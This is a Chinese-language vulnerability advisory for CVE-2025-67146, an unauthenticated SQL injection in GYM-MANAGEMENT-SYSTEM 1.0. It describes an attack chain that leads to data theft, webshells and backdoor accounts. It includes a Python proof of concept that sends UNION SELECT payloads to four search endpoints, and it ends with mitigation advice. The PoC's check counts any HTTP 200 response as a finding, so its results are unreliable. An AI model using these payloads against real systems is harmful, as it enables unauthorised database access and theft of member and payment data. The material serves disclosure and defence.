CVE-2025-67146 GYM-MANAGEMENT-SYSTEM 多处SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-67146

漏洞类型

SQL注入

CVSS评分

9.4 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AbhishekMali21 GYM-MANAGEMENT-SYSTEM 1.0

漏洞概述

CVE-2025-67146是GYM-MANAGEMENT-SYSTEM 1.0版本中的多个高危SQL注入漏洞。该系统是一款健身房管理应用程序，存在多处未充分过滤用户输入的安全缺陷。攻击者可通过构造恶意的SQL语句，利用'name'参数在member_search.php、trainer_search.php、gym_search.php三个文件，以及利用'id'参数在payment_search.php中进行SQL注入攻击。由于这些漏洞无需认证即可利用，远程攻击者可以直接通过HTTP请求注入恶意SQL代码，从而实现未授权数据库访问、数据窃取、认证绕过，甚至可能修改或删除数据库内容，对系统数据安全造成严重威胁。CVSS评分高达9.4，属于严重级别漏洞。

技术细节

该漏洞存在于GYM-MANAGEMENT-SYSTEM 1.0的多个搜索功能模块中，具体包括：1) member_search.php中的'name'参数存在SQL注入；2) trainer_search.php中的'name'参数存在SQL注入；3) gym_search.php中的'name'参数存在SQL注入；4) payment_search.php中的'id'参数存在SQL注入。漏洞根源在于应用程序未对用户输入进行充分的参数化查询或输入验证，直接将用户可控的参数拼接到SQL查询语句中。攻击者可通过在参数值中插入SQL元字符和恶意SQL命令（如UNION SELECT、布尔盲注、时间盲注等技巧），绕过原有查询逻辑，执行任意SQL操作。由于漏洞位于搜索功能且无需认证，攻击者可通过自动化工具批量探测和利用此漏洞。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标系统为GYM-MANAGEMENT-SYSTEM 1.0，确认存在member_search.php、trainer_search.php、gym_search.php、payment_search.php等易受攻击的端点

STEP 2

步骤2

漏洞探测：攻击者使用SQL注入Payload（如单引号、UNION SELECT语句）测试'name'和'id'参数，观察数据库错误响应或数据差异

STEP 3

步骤3

数据提取：利用UNION注入或盲注技术，逐步提取数据库中的敏感信息，包括用户凭证、会员数据、支付信息等

STEP 4

步骤4

权限提升：通过获取的管理员账号或会话信息，尝试登录后台管理系统

STEP 5

步骤5

持久化控制：写入webshell或创建后门账户，实现长期控制目标系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target = "http://target.com/GYM-MANAGEMENT-SYSTEM"

# SQL Injection PoC for member_search.php
payload_member = "' OR 1=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -"
url_member = f"{target}/member_search.php?name={payload_member}"

# SQL Injection PoC for trainer_search.php
payload_trainer = "' OR 1=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -"
url_trainer = f"{target}/trainer_search.php?name={payload_trainer}"

# SQL Injection PoC for gym_search.php
payload_gym = "' OR 1=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -"
url_gym = f"{target}/gym_search.php?name={payload_gym}"

# SQL Injection PoC for payment_search.php
payload_payment = "1 UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -"
url_payment = f"{target}/payment_search.php?id={payload_payment}"

def test_sqli(url, param_name):
    try:
        response = requests.get(url, timeout=10)
        if response.status_code == 200:
            print(f"[+] Possible SQL Injection found in {param_name}")
            print(f"[+] URL: {url}")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False

# Test all endpoints
test_sqli(url_member, "member_search.php?name")
test_sqli(url_trainer, "trainer_search.php?name")
test_sqli(url_gym, "gym_search.php?name")
test_sqli(url_payment, "payment_search.php?id")

影响范围

GYM-MANAGEMENT-SYSTEM 1.0

防御指南

临时缓解措施

立即停止使用受影响版本的GYM-MANAGEMENT-SYSTEM，或在Web应用防火墙中配置规则拦截包含SQL注入特征的请求（如单引号、UNION、SELECT等关键字）。同时建议对所有搜索功能参数进行输入过滤，使用白名单机制限制可接受字符，尽快升级到官方修复版本或迁移到其他安全的健身房管理系统。